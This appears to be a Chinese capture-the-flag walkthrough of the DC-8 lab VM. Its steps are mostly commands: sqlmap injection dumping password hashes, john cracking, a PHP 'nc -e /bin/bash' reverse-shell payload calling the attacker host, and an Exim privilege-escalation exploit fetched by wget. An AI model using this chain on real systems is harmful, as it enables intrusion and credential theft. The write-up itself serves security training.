DC-8靶机

ifconfig

查找主机IP

扫一波内网，探测下存活主机

nmap 192.168.61.0/24

使用nmap工具对DC-5靶机扫描开放的端口

nmap -A -T4 192.168.61.137 -p- -oN nmap137.A

点不同的选项，uid会变

猜测有sql注入

sqlmap -u "http://192.168.61.137/?nid=1"

sqlmap -u "http://192.168.61.137/?nid=1" --dbs

数据库：d7db 和 information_schema

sqlmap -u "http://192.168.61.137/?nid=1" -D d7db --tables

sqlmap -u "http://192.168.61.137/?nid=1" -D d7db -T users --columns

sqlmap -u "http://192.168.61.137/?nid=1" -D d7db -T users -C "uid,name,pass" --dump

<blank>      <blank>

admin         $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

john            $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

把密码保存到passwd.txt里

然后 john passwd.txt

得到密码 turtle （john的密码）

扫描后台

dirb http://192.168.61.137

192.168.61.137/user 

 

 这里可以插入木马（不过还有界面里可以上传文件，不知道会不会有文件上传漏洞）

反弹shell

插入<?php system("nc -e /bin/bash 192.168.61.129 7777"); ?>

然后在concat us页面提交

虚拟机：

nc -lvvp 7777

然后提权

反弹交互式shell

python -c 'import pty;pty.spawn("/binbash")'

查看设置了suid的权限

find / -perm -u=s -type f 2>/dev/null

exim命令在使用时具有root权限

有很多exp脚本，那么我们先看看靶机的exim的版本信息：

Exim 4.87 - 4.91 - Local Privilege Escalation

利用这个漏洞

下载代码

cp /usr/share/exploitdb/exploits/linux/local/46996.sh 46996.sh

进入root权限的/var/www/html

cd /var/www/html

vim wb.sh

写入46996.sh的内容

开启云服务器

service apache2 start

在靶机上：

cd /tmp （要进入/tmp，要不然权限不够）

在靶机上下载文件46996.sh

wget 192.168.61.129/wb.sh

然后赋予权限

chmod 4777 wb.sh （4777：把所有权限赋予）

然后可以运行

./wb.sh

但是没有提权到root

./wb.sh -m netcat 

再看就可以看到是root权限了

cd /root

ls

cat flag.txt